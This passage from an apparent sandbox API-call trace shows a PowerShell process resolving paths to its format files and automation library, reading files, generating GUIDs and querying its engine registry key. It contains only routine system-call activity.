nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.504] VirtualQuery (in: lpAddress=0x24bd60, lpBuffer=0x24cc20, dwLength=0x30 | out: lpBuffer=0x24cc20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.504] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd3626e74, Data2=0x418a, Data3=0x44c2, Data4=([0]=0xb0, [1]=0x22, [2]=0xfd, [3]=0x6a, [4]=0x75, [5]=0x79, [6]=0x5e, [7]=0x11))) returned 0x0 [0062.504] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.504] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x48366411, Data2=0x2717, Data3=0x4693, Data4=([0]=0xbc, [1]=0x4, [2]=0x99, [3]=0x68, [4]=0x29, [5]=0x3d, [6]=0x4e, [7]=0x4e))) returned 0x0 [0062.505] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xdfd40f37, Data2=0x189a, Data3=0x4fb2, Data4=([0]=0x9b, [1]=0xfc, [2]=0x99, [3]=0xe5, [4]=0x1d, [5]=0xe4, [6]=0x8a, [7]=0x4e))) returned 0x0 [0062.505] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1b39fa66, Data2=0xe81f, Data3=0x4de8, Data4=([0]=0xa1, [1]=0x1c, [2]=0x2f, [3]=0x34, [4]=0x12, [5]=0x5e, [6]=0xf0, [7]=0x85))) returned 0x0 [0062.505] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.505] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.505] SetErrorMode (uMode=0x1) returned 0x1 [0062.506] SetErrorMode (uMode=0x1) returned 0x1 [0062.506] GetFileType (hFile=0x308) returned 0x1 [0062.506] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.508] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.527] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.527] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.529] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.529] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.531] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.533] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.534] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.534] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.534] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.534] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.535] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.538] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.539] ReadFile (in: hFile=0x308, lpBuffer=0x374ffc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x374ffc8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.540] SetErrorMode (uMode=0x1) returned 0x1 [0062.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0062.540] SetErrorMode (uMode=0x1) returned 0x1 [0062.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x308) returned 0x0 [0062.541] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0 [0062.541] CoTaskMemAlloc (cb=0x5a) returned 0x1574e0 [0062.541] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1574e0, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0 [0062.541] CoTaskMemFree (pv=0x1574e0) [0062.541] RegCloseKey (hKey=0x308) returned 0x0 [0062.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0062.553] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x54824ac, Data2=0xad9, Data3=0x450d, Data4=([0]=0x98, [1]=0x4f, [2]=0x23, [3]=0xf2, [4]=0x32, [5]=0xca, [6]=0xfc, [7]=0x97))) returned 0x0 [0062.553] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x575d1ffe, Data2=0x8a9, Data3=0x448c, Data4=([0]=0xb3, [1]=0xc7, [2]=0x9c, [3]=0xe2, [4]=0x62, [5]=0xf2, [6]=0x5e, [7]=0xb))) returned 0x0 [0062.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.605] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8d555459, Data2=0x18bb, Data3=0x4336, Data4=([0]=0xb3, [1]=0x89, [2]=0xed, [3]=0xc7, [4]=0x16, [5]=0x97, [6]=0x27, [7]=0x2a))) returned 0x0 [0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 